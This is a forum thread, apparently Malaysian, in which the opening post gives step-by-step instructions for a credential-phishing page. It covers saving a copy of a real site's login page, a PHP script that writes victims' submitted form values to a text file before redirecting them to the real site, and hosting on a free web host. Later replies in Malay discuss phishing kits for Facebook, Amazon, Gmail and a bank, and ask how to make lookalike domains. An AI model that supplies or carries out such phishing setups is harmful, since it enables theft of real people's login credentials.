BTC USD 76,485.3 Gold USD 4,341.83
Time now: Jun 1, 12:00 AM

Phishing

pijan08

Fun Poster
Messages
611
Joined
Aug 8, 2010
Messages
611
Reaction score
37
Points
20
go to a website on mozilla firefox (recomended for phishing)
Save the whole page by going to File->Save Page As..
You will now have an HTML file and a folder full of images and maybe some Javascript files. Rename the HTML file to index.html and create another file called list.txt. This text file will hold the login credentials of the victims.
then open Notepad and paste the following code then press on file > save as > then the name should be phish.php and the type as all files...


Code:
<?phpHeader("Location: [url="http://www.realsite.com/"]http://www.RealSite.com[/url]");
 $handle = fopen("list.txt", "a");
 foreach($_GET as $variable => $value) {
 fwrite($handle, $variable);fwrite($handle, "=");fwrite($handle, $value);fwrite($handle, "\r\n");}fwrite($handle, "\r\n");
 fclose($handle);exit;?>

now place the three files on a web hosting site like :


www.webs.com


now make your victim log in

then check the list.txt
:)cgrock
 
macammana nak masukkan kat webs.com tu..??
 
daftar lu...pastu gi kat file manager pastu upload list.txt
 
ader gambar kat best


tak paham aku
 
yup,maybank mcm tu lah ia phising,tapi kena ada html maybank...

koleksi yg aq ada:

facebook,amazon,rapidshare,gmail,dan lain2 lagi....tapi ada kat laptop satu lagi,abang aq ambik..
 
yup,maybank mcm tu lah ia phising,tapi kena ada html maybank...

koleksi yg aq ada:

facebook,amazon,rapidshare,gmail,dan lain2 lagi....tapi ada kat laptop satu lagi,abang aq ambik..

face book tu macam best..domain lak camne nak tukar kasi sama??
 
domain ia tetap ada alamat facebook tapi belakang ia lain sikit..
 
bg contoh sket..
www. facebook.com/???
 
Last edited:
Back
Top
Log in Register